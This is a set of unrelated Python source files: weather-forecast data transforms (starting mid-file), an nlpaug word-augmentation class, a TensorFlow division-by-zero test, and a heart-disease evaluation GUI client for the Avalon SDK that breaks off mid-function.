new_example[k] = example[k] return new_example class AddMetadata: """Add various metadata to the example dict.""" def __call__(self, example): model = example["terciles"] year = int(model.forecast_time.dt.year) month = int(model.forecast_time.dt.month) day = int(model.forecast_time.dt.day) example["monthday"] = f"{month:02}{day:02}" example["month"] = f"{month:02}" example["year"] = f"{year:04}" example["latitude"] = model.latitude example["longitude"] = model.longitude return example class AddDryMask: def __init__(self, threshold=0.01): self.threshold = threshold def __call__(self, example): edges = example["edges"] wet_mask = (edges.isel(category_edge=0) > self.threshold).drop("t2m") example["dry_mask"] = ~wet_mask return example class ExampleToPytorch: def __call__(self, example): pytorch_example = {} for dataset_name in [ "obs", "model", "features", "terciles", "edges", "model_parameters", "dry_mask", "eccc_parameters", "ncep_parameters", ]: if dataset_name in example: dataset = example[dataset_name] for variable in dataset.data_vars: new_key = f"{dataset_name}_{variable}" pytorch_example[new_key] = torch.from_numpy(dataset[variable].data) for k in ["year", "monthday", "month", "eccc_available", "ncep_available"]: pytorch_example[k] = example[k] for k in ["latitude", "longitude"]: pytorch_example[k] = torch.from_numpy(example[k].data) return pytorch_example class CompositeTransform: def __init__(self, transforms): self.transforms = transforms def __call__(self, example): transformed_example = example for t in self.transforms: transformed_example = t(transformed_example) return transformed_example def __repr__(self): inner_str = ", ".join([repr(t) for t in self.transforms]) return f"CompositeTransform([{inner_str}])" def t2m_to_normal(model): model_t2m_mean = model.t2m.mean(dim=["lead_time", "realization"]).rename("t2m_mu") model_t2m_std = std_estimator(model.t2m, dim=["lead_time", "realization"]).rename( "t2m_sigma" ) return xr.merge([model_t2m_mean, model_t2m_std]).rename( biweekly_forecast="lead_time" ) def tp_to_normal(model): model_tp_mean = model.tp.isel(lead_time=-1).mean(dim="realization").rename("tp_mu") model_tp_std = std_estimator(model.tp.isel(lead_time=-1), dim="realization").rename( "tp_sigma" ) return ( xr.merge([model_tp_mean, model_tp_std]) .drop("lead_time") .rename(biweekly_forecast="lead_time") ) def model_to_distribution(model): model_t2m = t2m_to_normal(model) model_tp = tp_to_normal(model) return xr.merge([model_t2m, model_tp]) class LinearModelAdapter: def __init__(self, make_distributions=True): self.make_distributions = make_distributions def __call__(self, example): if self.make_distributions: example["model"] = model_to_distribution(example["model"]) example["obs"] = obs_to_biweekly(example["obs"]) return example class CubeRootTP: """Apply a cubic root on precipitation data.""" def __init__(self): pass def __call__(self, example): for k in ["obs_tp", "edges_tp"]: if k in example: example[k] = example[k] ** (1.0 / 3.0) return example class AddLatLonFeature: def __init__(self): pass def __call__(self, example): obs = example["terciles"] lat_array = obs["latitude"].assign_coords(variable="lat") lat_array = (lat_array / lat_array.max()).astype("float32") lon_array = obs["longitude"].assign_coords(variable="lon") lon_array = np.sin(np.deg2rad(lon_array)).astype("float32") features_array = example["features"].features catted_features = xr.concat( [features_array, lat_array, lon_array], dim="variable" ) example["features"] = catted_features.to_dataset() return example class AddGeographyFeatures: def __init__(self, geography_file): geo_dataset = fix_s2s_dataset_dims(xr.open_dataset(geography_file)) subset = geo_dataset[["orog"]] geo = normalize_dataset(subset) self.geo_features = geo.to_array().to_dataset(name="features") def __call__(self, batch): features = batch["features"] geo_at_lead = self.geo_features.sel(lead_time=features.lead_time) new_features_dataset = xr.concat([features, geo_at_lead], dim="variable") batch["features"] = new_features_dataset return batch class RandomNoise: def __init__(self, keys=["features_features"], sigma=0.01): self.keys = keys self.sigma = sigma def __call__(self, example): for k in self.keys: x = example[k] example[k] += self.sigma * torch.randn_like(x) return example class LongitudeRoll: def __init__(self): pass def __call__(self, example): obs = example["terciles"] longitude_length = obs.sizes["longitude"] roll = random.randint(0, longitude_length) rolled_example = example for k in example: if k not in ["eccc_available", "ncep_available"]: rolled_dataset = ( example[k].roll(longitude=roll, roll_coords=True).drop("longitude") ) rolled_example[k] = rolled_dataset return rolled_example class MembersSubsetTransform: def __init__(self, subset_size=1): self.subset_size = subset_size def __call__(self, example): features = example["features"] n_members = features.sizes["realization"] members = sorted(random.choices(range(n_members), k=self.subset_size)) features = features.isel(realization=members) example["features"] = features return example class AddDateFeatureTransform: def __call__(self, example): features = example["features"] date_features = np.sin( features.valid_time.assign_coords(variable="date").dt.dayofyear / 366 ) new_features = xr.concat( [features.features, date_features], dim="variable" ).astype("float32") example["features"] = new_features.to_dataset() return example class VariableFilterTransform: def __init__(self, to_filter=None): self.to_filter = to_filter if to_filter is not None: _logger.info("Will filter vars: %s", to_filter) def __call__(self, batch): if self.to_filter is not None: batch["features"] = batch["features"].sel(variable=self.to_filter) return batch def full_transform( geography_file, weeks_12=False, make_distributions=False, random_noise_sigma=0.0, roll=False, n_members=1, filter_vars=None, biweekly_features=False, add_date=False, ): xarray_transforms = [ MembersSubsetTransform(n_members), AddLatLonFeature(), AddGeographyFeatures(geography_file), VariableFilterTransform(filter_vars), AddBiweeklyDimTransform(weeks_12, features=biweekly_features), ] if add_date: xarray_transforms.insert(2, AddDateFeatureTransform()) if roll: xarray_transforms.append(LongitudeRoll()) transforms = [ *xarray_transforms, # LinearModelAdapter(make_distributions=make_distributions), AddMetadata(), ExampleToPytorch(), CubeRootTP(), RandomNoise(sigma=random_noise_sigma), ] return CompositeTransform(transforms)
""" Augmenter that apply random word operation to textual input. """ from nlpaug.augmenter.word import WordAugmenter from nlpaug.util import Action, Doc class RandomWordAug(WordAugmenter): """ Augmenter that apply randomly behavior for augmentation. :param str action: 'substitute', 'swap', 'delete' or 'crop'. If value is 'swap', adjacent words will be swapped randomly. If value is 'delete', word will be removed randomly. If value is 'crop', a set of contunous word will be removed randomly. :param float aug_p: Percentage of word will be augmented. :param int aug_min: Minimum number of word will be augmented. :param int aug_max: Maximum number of word will be augmented. If None is passed, number of augmentation is calculated via aup_p. If calculated result from aug_p is smaller than aug_max, will use calculated result from aug_p. Otherwise, using aug_max. :param list stopwords: List of words which will be skipped from augment operation. Not effective if action is 'crop' :param str stopwords_regex: Regular expression for matching words which will be skipped from augment operation. Not effective if action is 'crop' :param list target_words: List of word for replacement (used for substitute operation only). Default value is _. :param func tokenizer: Customize tokenization process :param func reverse_tokenizer: Customize reverse of tokenization process :param str name: Name of this augmenter >>> import nlpaug.augmenter.word as naw >>> aug = naw.RandomWordAug() """ def __init__(self, action=Action.DELETE, name='RandomWord_Aug', aug_min=1, aug_max=10, aug_p=0.3, stopwords=None, target_words=None, tokenizer=None, reverse_tokenizer=None, stopwords_regex=None, verbose=0): super().__init__( action=action, name=name, aug_p=aug_p, aug_min=aug_min, aug_max=aug_max, stopwords=stopwords, tokenizer=tokenizer, reverse_tokenizer=reverse_tokenizer, device='cpu', verbose=verbose, stopwords_regex=stopwords_regex, include_detail=False) self.target_words = target_words or ['_'] # https://arxiv.org/pdf/1711.02173.pdf, https://arxiv.org/pdf/1809.02079.pdf, https://arxiv.org/pdf/1903.09460.pdf def swap(self, data): if not data or not data.strip(): return data change_seq = 0 doc = Doc(data, self.tokenizer(data)) aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens()) # https://github.com/makcedward/nlpaug/issues/76 if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2: if self.include_detail: return data, [] return data for aug_idx in aug_idxes: swap_idx = self._get_swap_position(aug_idx, doc.size() - 1) change_seq += 1 doc = self.change_case(doc, aug_idx, swap_idx, change_seq) if self.include_detail: return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs() else: return self.reverse_tokenizer(doc.get_augmented_tokens()) # TODO: Tune it def change_case(self, doc, original_word_idx, swap_word_idx, change_seq): original_token = doc.get_token(original_word_idx).get_latest_token().token swap_token = doc.get_token(swap_word_idx).get_latest_token().token if original_word_idx != 0 and swap_word_idx != 0: doc.add_change_log(original_word_idx, new_token=swap_token, action=Action.SWAP, change_seq=self.parent_change_seq+change_seq) doc.add_change_log(swap_word_idx, new_token=original_token, action=Action.SWAP, change_seq=self.parent_change_seq+change_seq) return doc original_token_case = self.get_word_case(original_token) swap_token_case = self.get_word_case(swap_token) if original_word_idx == 0: if original_token_case == 'capitalize' and swap_token_case == 'lower': doc.add_change_log(original_word_idx, new_token=swap_token.capitalize(), action=Action.SWAP, change_seq=self.parent_change_seq+change_seq) else: doc.add_change_log(original_word_idx, new_token=swap_token, action=Action.SWAP, change_seq=self.parent_change_seq+change_seq) if original_token_case == 'capitalize': doc.add_change_log(swap_word_idx, new_token=original_token.lower(), action=Action.SWAP, change_seq=self.parent_change_seq+change_seq) else: doc.add_change_log(swap_word_idx, new_token=original_token, action=Action.SWAP, change_seq=self.parent_change_seq+change_seq) if swap_word_idx == 0: if original_token_case == 'lower': doc.add_change_log(swap_word_idx, new_token=original_token.capitalize(), action=Action.SWAP, change_seq=self.parent_change_seq+change_seq) else: doc.add_change_log(swap_word_idx, new_token=original_token, action=Action.SWAP, change_seq=self.parent_change_seq+change_seq) if swap_token_case == 'capitalize': doc.add_change_log(original_word_idx, new_token=swap_token.lower(), action=Action.SWAP, change_seq=self.parent_change_seq+change_seq) else: doc.add_change_log(original_word_idx, new_token=swap_token, action=Action.SWAP, change_seq=self.parent_change_seq+change_seq) # Special case for i if doc.get_token(original_word_idx).get_latest_token().token == 'i': doc.update_change_log(original_word_idx, token='I') if doc.get_token(swap_word_idx).get_latest_token().token == 'i': doc.update_change_log(swap_word_idx, token='I') return doc def _get_swap_position(self, pos, token_length): if pos == 0: # Force swap with next character if it is first character return pos + 1 elif pos == token_length: # Force swap with previous character if it is last character return pos - 1 else: return pos + self.sample([-1, 1], 1)[0] # https://arxiv.org/pdf/1703.02573.pdf, https://arxiv.org/pdf/1712.06751.pdf, https://arxiv.org/pdf/1806.09030.pdf # https://arxiv.org/pdf/1905.11268.pdf, def substitute(self, data): if not data or not data.strip(): return data change_seq = 0 doc = Doc(data, self.tokenizer(data)) aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens()) aug_idxes.sort(reverse=True) if aug_idxes is None or len(aug_idxes) == 0: if self.include_detail: return data, [] return data for aug_idx in aug_idxes: original_token = doc.get_token(aug_idx).orig_token.token new_token = self.sample(self.target_words, 1)[0] if aug_idx == 0: new_token = self.align_capitalization(original_token, new_token) change_seq += 1 doc.add_change_log(aug_idx, new_token=new_token, action=Action.SUBSTITUTE, change_seq=self.parent_change_seq+change_seq) if self.include_detail: return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs() else: return self.reverse_tokenizer(doc.get_augmented_tokens()) # https://arxiv.org/pdf/1905.11268.pdf, https://arxiv.org/pdf/1809.02079.pdf, https://arxiv.org/pdf/1903.09460.pdf def delete(self, data): if not data or not data.strip(): return data change_seq = 0 doc = Doc(data, self.tokenizer(data)) aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens()) aug_idxes.sort(reverse=True) # https://github.com/makcedward/nlpaug/issues/76 if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2: if self.include_detail: return data, [] return data for aug_idx in aug_idxes: original_token = doc.get_token(aug_idx).orig_token.token change_seq += 1 doc.add_change_log(aug_idx, new_token='', action=Action.DELETE, change_seq=self.parent_change_seq+change_seq) if aug_idx == 0: new_token = self.align_capitalization(original_token, doc.get_token(1).orig_token.token) doc.add_change_log(1, new_token=new_token, action=Action.ALIGN, change_seq=self.parent_change_seq+change_seq) if self.include_detail: return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs() else: return self.reverse_tokenizer(doc.get_augmented_tokens()) # https://github.com/makcedward/nlpaug/issues/126 def crop(self, data): if not data or not data.strip(): return data change_seq = 1 doc = Doc(data, self.tokenizer(data)) aug_idxes = self._get_aug_range_idxes(doc.get_original_tokens()) aug_idxes.sort(reverse=True) # https://github.com/makcedward/nlpaug/issues/76 if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2: if self.include_detail: return data, [] return data for aug_idx in aug_idxes: original_token = doc.get_token(aug_idx).orig_token.token doc.add_change_log(aug_idx, new_token='', action=Action.CROP, change_seq=self.parent_change_seq+change_seq) if aug_idx == 0: new_token = self.align_capitalization(original_token, doc.get_token(1).orig_token.token) doc.add_change_log(1, new_token=new_token, action=Action.ALIGN, change_seq=self.parent_change_seq+change_seq) if self.include_detail: return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs() else: return self.reverse_tokenizer(doc.get_augmented_tokens())
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for integer division by zero.""" from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.framework import test_util from tensorflow.python.platform import test class ZeroDivisionTest(test.TestCase): def testZeros(self): with test_util.use_gpu(): for dtype in dtypes.uint8, dtypes.int16, dtypes.int32, dtypes.int64: zero = constant_op.constant(0, dtype=dtype) one = constant_op.constant(1, dtype=dtype) bads = [lambda x, y: x // y] if dtype in (dtypes.int32, dtypes.int64): bads.append(lambda x, y: x % y) for bad in bads: try: result = self.evaluate(bad(one, zero)) except (errors.OpError, errors.InvalidArgumentError) as e: # Ideally, we'd get a nice exception. In theory, this should only # happen on CPU, but 32 bit integer GPU division is actually on # CPU due to a placer bug. # TODO(irving): Make stricter once the placer bug is fixed. self.assertIn('Integer division by zero', str(e)) else: # On the GPU, integer division by zero produces all bits set. # But apparently on some GPUs "all bits set" for 64 bit division # means 32 bits set, so we allow 0xffffffff as well. This isn't # very portable, so we may need to expand this list if other GPUs # do different things. # # XLA constant folds integer division by zero to 1. self.assertTrue(test.is_gpu_available()) self.assertIn(result, (-1, 1, 2, 0xff, 0xffffffff)) if __name__ == '__main__': test.main()
#! /usr/bin/env python3 # Copyright 2019 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Heart Evaluation GUI Client for use in submitting data to worker. """ import os import sys import random import json import argparse import logging import secrets # Tkinter imports import tkinter as tk import tkinter.messagebox as messagebox import tkinter.font as font from PIL import ImageTk, Image # Avalon imports import crypto_utils.crypto_utility as utility import avalon_sdk.worker.worker_details as worker from avalon_sdk.worker.worker_details import WorkerType from avalon_sdk.work_order.work_order_params import WorkOrderParams from avalon_sdk.direct.avalon_direct_client import AvalonDirectClient import config.config as pconfig import utility.logger as plogger import crypto_utils.crypto.crypto as crypto from error_code.error_status import WorkOrderStatus, ReceiptCreateStatus import crypto_utils.signature as signature from error_code.error_status import SignatureStatus from avalon_sdk.work_order_receipt.work_order_receipt \ import WorkOrderReceiptRequest # Remove duplicate loggers for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) logger = logging.getLogger(__name__) # Default TCFHOME assumes PWD is examples/apps/heart_disease_eval/client : TCFHOME = os.environ.get("TCF_HOME", "../../../../") # GUI color scheme BACKGROUND = "light sky blue" ENTRY_COLOR = "light grey" BUTTON_COLOR = "deep sky blue" RESULT_BACKGROUND = "pale goldenrod" # ----------------------------------------------------------------- def _generate_random_or_normal_number(normal, percent_normal, low, high): """Generate number "normal" for "percent_normal" % of the time. Otherwise, generate a random number in the interval ["low", "high"]. """ if percent_normal >= random.randint(0, 100): return normal return random.randint(low, high) def _generate_random_data(): """Generate a random data string for input as evaluation data. For example: "35 0 1 67 102 125 1 95 0 10 1 1 3 1" """ age = _generate_random_or_normal_number(35, 67, 18, 100) sex = _generate_random_or_normal_number(0, 50, 1, 1) cp = _generate_random_or_normal_number(4, 67, 1, 3) trestbps = _generate_random_or_normal_number(67, 67, 108, 218) chol = _generate_random_or_normal_number(102, 67, 126, 309) fbs = _generate_random_or_normal_number(125, 67, 98, 248) restecg = _generate_random_or_normal_number(0, 67, 1, 2) thalach = _generate_random_or_normal_number(95, 67, 61, 198) exang = _generate_random_or_normal_number(0, 67, 1, 1) oldpeak = _generate_random_or_normal_number(10, 67, 0, 100) slop = _generate_random_or_normal_number(0, 67, 1, 2) ca = _generate_random_or_normal_number(0, 67, 1, 3) thaldur = _generate_random_or_normal_number(3, 67, 6, 7) num = _generate_random_or_normal_number(0, 67, 1, 1) return "{} {} {} {} {} {} {} {} {} {} {} {} {} {}".format( age, sex, cp, trestbps, chol, fbs, restecg, thalach, exang, oldpeak, slop, ca, thaldur, num) def _int_validate(text): """Validates that input is a non-negative integer.""" if str.isdigit(text) or text == "": return True else: return False def _float_validate(text): """Validates that input is a non-negative, non-special float.""" if text == "": return True try: float(text) if float(text) < 0.0 or float(text) == float("NaN") \ or float(text) == float("INF") \ or float(text) == float("-INF"): return False return True except ValueError: return False class intEntry: """User entry for non-negative integer.""" def __init__(self, master, name): global cur_row label = tk.Label(master, text=name, background=BACKGROUND) label.grid(row=cur_row, column=0, sticky="e", pady=(5, 0)) validate = (master.register(_int_validate)) self.entry = tk.Entry( master, validate="all", validatecommand=(validate, "%P"), width=5, background=ENTRY_COLOR) self.entry.grid( row=cur_row, column=1, padx=(10, 0), pady=(5, 0), sticky="w") cur_row += 1 def get(self): # Fails if empty field try: return int(self.entry.get()) except ValueError: return None def enable(self): self.entry.config(state=tk.NORMAL) def disable(self): self.entry.config(state=tk.DISABLED) class floatEntry: """User entry for non-negative, non-special floating point number.""" def __init__(self, master, name): global cur_row label = tk.Label(master, text=name, background=BACKGROUND) label.grid(row=cur_row, column=0, sticky="e", pady=(5,)) validate = (master.register(_float_validate)) self.entry = tk.Entry( master, validate="all", validatecommand=(validate, "%P"), width=10, background=ENTRY_COLOR) self.entry.grid(row=cur_row, column=1, padx=(10, 0), pady=(5,), sticky="w") cur_row += 1 def get(self): try: return float(self.entry.get()) except ValueError: return None def enable(self): self.entry.config(state=tk.NORMAL) def disable(self): self.entry.config(state=tk.DISABLED) class radio: """User entry for a radio button.""" # Options is a list of text-value pairs def __init__(self, master, name, options): global cur_row if not all(len(tup) == 2 for tup in options): print("ERROR: Mismatched text-value pairs") exit(1) self.var = tk.IntVar() self.var.set(None) label = tk.Label(master, text=name, background=BACKGROUND) label.grid(row=cur_row, column=0, pady=(5, 0), sticky="e") self.button_list = [] for i in range(len(options)): button = tk.Radiobutton( master, text=options[i][0], variable=self.var, value=options[i][1], background=BACKGROUND) self.button_list.append(button) if i == 0: button.grid(row=cur_row, column=1, pady=(5, 0), sticky="w") else: button.grid(row=cur_row, column=1, sticky="w") cur_row += 1 def get(self): try: return self.var.get() except tk.TclError: return None def enable(self): for button in self.button_list: button.config(state=tk.NORMAL) def disable(self): for button in self.button_list: button.config(state=tk.DISABLED) class resultWindow(tk.Toplevel): """Create result window that appears after clicking "Evaluate".""" def __init__(self, parent, message): tk.Toplevel.__init__(self, parent) self.config(background=RESULT_BACKGROUND) self.parent = parent # Lock main window self.transient(parent) self.grab_set() self.initial_focus = self self.initial_focus.focus_set() self.title("Evaluation Result") self.protocol("WM_DELETE_WINDOW", self.close) # Main content self.main_frame = tk.Frame(self, background=RESULT_BACKGROUND) self.main_frame.pack() self.frame1 = tk.Frame(self.main_frame) self.frame1.pack(side=tk.LEFT) self.result_text = tk.StringVar() self.label = tk.Label( self.frame1, textvariable=self.result_text, width=45, background=RESULT_BACKGROUND) default_font = font.Font(font="TkDefaultFont") new_font = default_font new_font.config(weight=font.BOLD) self.label.config(font=new_font) self.label.pack() # JSON window display sidebar buttons self.frame2 = tk.Frame(self.main_frame, background=RESULT_BACKGROUND) self.frame2.pack(side=tk.LEFT) self.frame2 = tk.Frame( self.frame2, background=RESULT_BACKGROUND) self.frame2.pack(side=tk.LEFT) self.request_button = tk.Button( self.frame2, text="View Request", command=self.request, background=BUTTON_COLOR) self.request_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0)) self.result_button = tk.Button( self.frame2, text="View Result", command=self.result, background=BUTTON_COLOR) self.result_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0)) self.receipt_button = tk.Button( self.frame2, text="View Receipt", command=self.receipt, background=BUTTON_COLOR) self.receipt_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0)) # Close button self.close_button = tk.Button( self, text="Close", command=self.close, background=BUTTON_COLOR) self.close_button.pack(pady=(0, 5)) self.evaluate(message) def evaluate(self, message): """Create and submit workorder and wait for result.""" self.result_text.set("Waiting for evaluation result...") self.update() # Create, sign, and submit workorder. # Convert workloadId to hex. workload_id = "heart-disease-eval" workload_id = workload_id.encode("UTF-8").hex() session_iv = utility.generate_iv() session_key = utility.generate_key() requester_nonce = secrets.token_hex(16) work_order_id = secrets.token_hex(32) requester_id = secrets.token_hex(32) wo_params = WorkOrderParams( work_order_id, worker_id, workload_id, requester_id, session_key, session_iv, requester_nonce, result_uri=" ", notify_uri=" ", worker_encryption_key=worker_obj.encryption_key, data_encryption_algorithm="AES-GCM-256" ) wo_params.add_in_data(message) wo_params.add_encrypted_request_hash() private_key = utility.generate_signing_keys() if requester_signature: # Add requester signature and requester verifying_key if wo_params.add_requester_signature(private_key) is False: logger.info("Work order request signing failed") exit(1) # Set text for JSON sidebar req_id = 51 self.request_json = wo_params.to_jrpc_string(req_id) work_order_instance = direct_jrpc.get_work_order_instance() response = work_order_instance.work_order_submit( wo_params.get_work_order_id(), wo_params.get_worker_id(), wo_params.get_requester_id(), wo_params.to_string(), id=req_id ) logger.info("Work order submit response : {}\n ".format( json.dumps(response, indent=4) )) if "error" in response and response["error"]["code"] != \ WorkOrderStatus.PENDING: sys.exit(1) # Create work order receipt req_id += 1 wo_receipt_instance = direct_jrpc.get_work_order_receipt_instance() wo_request = json.loads(self.request_json) wo_receipt_obj = WorkOrderReceiptRequest() wo_create_receipt = wo_receipt_obj.create_receipt( wo_request, ReceiptCreateStatus.PENDING.value, private_key ) logger.info("Work order create receipt request : {} \n \n ".format( json.dumps(wo_create_receipt, indent=4) )) # Submit work order create receipt jrpc request wo_receipt_resp = wo_receipt_instance.work_order_receipt_create( wo_create_receipt["workOrderId"], wo_create_receipt["workerServiceId"], wo_create_receipt["workerId"], wo_create_receipt["requesterId"], wo_create_receipt["receiptCreateStatus"], wo_create_receipt["workOrderRequestHash"], wo_create_receipt["requesterGeneratedNonce"], wo_create_receipt["requesterSignature"], wo_create_receipt["signatureRules"], wo_create_receipt["receiptVerificationKey"], req_id ) logger.info("Work order create receipt response : {} \n \n ".format( wo_receipt_resp )) # Retrieve result and set GUI result text res = work_order_instance.work_order_get_result( work_order_id, req_id ) self.result_json = json.dumps(res, indent=4) if "result" in res: sig_obj = signature.ClientSignature() status = sig_obj.verify_signature( res, worker_obj.verification_key) try: if status == SignatureStatus.PASSED: logger.info("Signature verification Successful") decrypted_res = utility. \ decrypted_response(res, session_key, session_iv) logger.info("\n" + "Decrypted response:\n {}". format(decrypted_res)) else: logger.info("Signature verification Failed") sys.exit(1) except Exception as err: logger.info("ERROR: Failed to decrypt response: %s", str(err)) sys.exit(1) else: logger.info("\n Work order get result failed {}\n".format(res)) sys.exit(1) # Set text for JSON sidebar self.result_text.set( decrypted_res[0]["data"]) # Retrieve receipt # Set text for JSON sidebar req_id += 1 self.receipt_json = json.dumps( wo_receipt_instance.work_order_receipt_retrieve( work_order_id, req_id ), indent=4 ) def request(self): jsonWindow(self, self.request_json, "Request JSON") def result(self): jsonWindow(self, self.result_json, "Result JSON") def receipt(self): jsonWindow(self, self.receipt_json, "Receipt JSON") def close(self): self.parent.focus_set() self.destroy() class jsonWindow(tk.Toplevel): """Template for JSON display (from clicking View Request/Result/Receipt buttons). """ def __init__(self, parent, json, title): tk.Toplevel.__init__(self, parent) self.title(title) self.scrollbar = tk.Scrollbar(self) self.scrollbar.pack(side=tk.RIGHT, fill=tk.Y) self.text = tk.Text(self, yscrollcommand=self.scrollbar.set) self.text.insert(tk.END, json) self.text.config(state=tk.DISABLED) self.text.pack(expand=True, fill="both") self.scrollbar.config(command=self.text.yview) def gui_main(): """Create main Tkinter window and "Evaluate" event handler.""" root = tk.Tk() root.title("Heart Disease Evaluation") root.config(background=BACKGROUND) # Display image imageFile = TCFHOME + \ "/examples/apps/heart_disease_eval/images/ecg.jpg" img = ImageTk.PhotoImage(Image.open(imageFile)) canvas = tk.Canvas(root, width=290, height=220, background=BACKGROUND) canvas.pack() canvas.create_image(20, 20, anchor=tk.NW, image=img) # Setup left and right frames for data entry var_root = tk.Frame(root, background=BACKGROUND) var_root.pack(pady=(10, 0)) v_frame1 = tk.Frame(var_root, background=BACKGROUND) v_frame1.pack(fill=tk.Y, side=tk.LEFT, padx=(10, 0)) v_frame2 = tk.Frame(var_root, background=BACKGROUND) v_frame2.pack(fill=tk.Y, side=tk.LEFT, padx=(0, 10)) # Organizes parameter grid global cur_row cur_row = 0 # Parameter grid age = intEntry(v_frame1, "Age") sex = radio(v_frame1, "Sex", [("Male", 1), ("Female", 0)]) cp = radio(v_frame1, "Chest pain type", [("Typical angina", 1), ("Atypical angina", 2), ("Non-anginal pain", 3), ("Asymptomatic", 4)]) trestbps = intEntry(v_frame1, "Resting blood pressure\n (mm Hg)") chol = intEntry(v_frame1, "Serum cholesterol (mg/dl)") fbs = intEntry(v_frame1, "Fasting blood sugar (mg/dl)") restecg = radio(v_frame1, "Electrocardiographic\n resting results", [("Normal", 0), ("ST-T wave abnormality", 1), ("Showing hypertrophy", 2)]) thalach = intEntry(v_frame1, "Maximum heart rate") exang = radio(v_frame2, "Exercise induced angina", [("Yes", 1), ("No", 0)]) oldpeak = floatEntry( v_frame2, "ST depression induced by\n exercise relative to rest") slope = radio(v_frame2, "Slope of the peak\n exercise ST segment", [("Upsloping", 0), ("Flat", 1), ("Downsloping", 2)]) ca = radio(v_frame2, "Major vessels colored\n by flouroscopy", [("0", 0), ("1", 1), ("2", 2), ("3", 3)]) thal = radio( v_frame2, "Thallium stress test", [("Normal", 3), ("Fixed defect", 6), ("Reversible defect", 7)]) num = radio(v_frame2, "Heart disease diagnosis", [("<50% diameter narrowing", 0), (">50% diameter narrowing", 1)]) var_list = [age, sex, cp, trestbps, chol, fbs, restecg, thalach, exang, oldpeak, slope, ca, thal, num] def string_toggle(): """Disable/enable other variable entries/buttons based on whether string input option is selected. """ if string_use.get() == 1 or random_use.get() == 1: for var in var_list: var.disable() string_entry.config(state=tk.NORMAL) else: for var in var_list: var.enable() string_entry.config(state=tk.DISABLED) # Input vars as string option with a check button to enable random_frame = tk.Frame(root, background=ENTRY_COLOR) random_frame.pack() # Option to generate random data entry random_use = tk.IntVar() random_check = tk.Checkbutton( random_frame, command=string_toggle, variable=random_use, background=BACKGROUND) random_check.pack(side=tk.LEFT) random_label = tk.Label( random_frame, text="Generate random data ", background=BACKGROUND) random_label.pack(side=tk.LEFT) # Option to enter data as space-separated string entries string_frame = tk.Frame(root, background=ENTRY_COLOR) string_frame.pack() string_use = tk.IntVar() string_check = tk.Checkbutton( string_frame, command=string_toggle, variable=string_use, background=BACKGROUND) string_check.pack(side=tk.LEFT) string_label = tk.Label( string_frame, text="Input variables as a string", background=BACKGROUND) string_label.pack(side=tk.LEFT) string_entry = tk.Entry( string_frame, state=tk.DISABLED, width=50, background=ENTRY_COLOR) string_entry.pack(side=tk.LEFT) def evaluate(): """Open window that will submit work order and retrieve an evaluation result. """ message = "Heart disease evaluation data: " if string_use.get() == 1: # input is space-separated numbers input_data = string_entry.get() if input_data is None or len(input_data) == 0: messagebox.showwarning( "Error", "Must input space-separated variables") return message = message + input_data elif random_use.get() == 1: input_data = _generate_random_data() if input_data is None or len(input_data) == 0: messagebox.showwarning( "Error", "Random variable generation error") return message = message + input_data else: for var in var_list: if var.get() is None: messagebox.showwarning("Error", "Must input all variables") return message = message + str(var.get()) + " " root.wait_window(resultWindow(root, message)) def aggregate(): """Open window that will submit work order to retrieve an aggregate result. """ message = "Heart disease aggregate data: " root.wait_window(resultWindow(root, message)) # "Evaluate" button eval_text = tk.StringVar() eval_label = tk.Label(root, textvariable=eval_text, background=BACKGROUND) eval_label.pack() eval_button = tk.Button(root, text="Evaluate", command=evaluate, background=BUTTON_COLOR) eval_button.pack() # "Aggregate" button aggr_text = tk.StringVar() aggr_label = tk.Label(root, textvariable=aggr_text, background=BACKGROUND) aggr_label.pack() aggr_button = tk.Button(root, text="Aggregate all data", command=aggregate, background=BUTTON_COLOR) aggr_button.pack(pady=(0, 10)) root.mainloop() def parse_command_line(args): """Setup and parse command line arguments and help information.""" global worker_obj global worker_id global verbose global config global off_chain global requester_signature parser = argparse.ArgumentParser() use_service = parser.add_mutually_exclusive_group() parser.add_argument( "-c", "--config", help="the config file containing the" + " Ethereum contract information", type=str) use_service.add_argument( "-r", "--registry-list", help="the Ethereum address of the registry list", type=str) use_service.add_argument( "-s", "--service-uri", help="skip URI lookup and send to specified URI", type=str) use_service.add_argument( "-o", "--off-chain", help="skip URI lookup and use the registry in the config file", action="store_true") parser.add_argument( "-w", "--worker-id", help="skip worker lookup and retrieve specified worker", type=str) parser.add_argument( "-v", "--verbose", help="increase output verbosity", action="store_true") parser.add_argument( "-rs", "--requester_signature", help="Enable requester signature for work order requests", action="store_true") options = parser.parse_args(args) if options.config: conf_files = [options.config] else: conf_files = [TCFHOME + "/sdk/avalon_sdk/tcf_connector.toml"] conf_paths = ["."] try: config = pconfig.parse_configuration_files(conf_files, conf_paths) json.dumps(config, indent=4) except pconfig.ConfigurationException as e: logger.error(str(e)) sys.exit(-1) global direct_jrpc direct_jrpc = AvalonDirectClient(conf_files[0]) # Whether or not to connect to the registry list on 